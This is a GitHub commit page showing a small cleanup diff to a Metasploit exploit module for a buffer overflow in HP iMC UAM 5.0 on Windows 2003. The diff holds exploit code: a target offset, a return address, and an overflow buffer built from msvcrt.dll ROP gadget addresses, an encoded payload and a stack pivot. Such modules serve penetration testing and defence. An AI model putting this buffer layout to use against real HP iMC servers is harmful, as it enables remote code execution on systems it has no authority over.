Skip to content

Commit

Permalink
cleanup
Browse files Browse the repository at this point in the history
  • Loading branch information
jvazquez-r7 committed Nov 1, 2012
1 parent e720769 commit 22fbfb3
Showing 1 changed file with 1 addition and 2 deletions.
3 changes: 1 addition & 2 deletions modules/exploits/windows/misc/hp_imc_uam.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,6 @@ def initialize(info = {})
[ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2',
{
'Offset' => 4035,
'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe
}
]
],
Expand Down Expand Up @@ -116,7 +115,7 @@ def exploit
bof << rop_gadgets
bof << payload.encoded
bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length)
bof << [0x77bb0c86].pack("V") # XCHG EAX,ESI # RETN # from msvcrt.dll
bof << [0x77bb0c86].pack("V") # EIP => XCHG EAX,ESI # RETN # from msvcrt.dll
bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll
bof << [junk].pack("V") # EBP
bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll
Expand Down

0 comments on commit 22fbfb3

Please sign in to comment.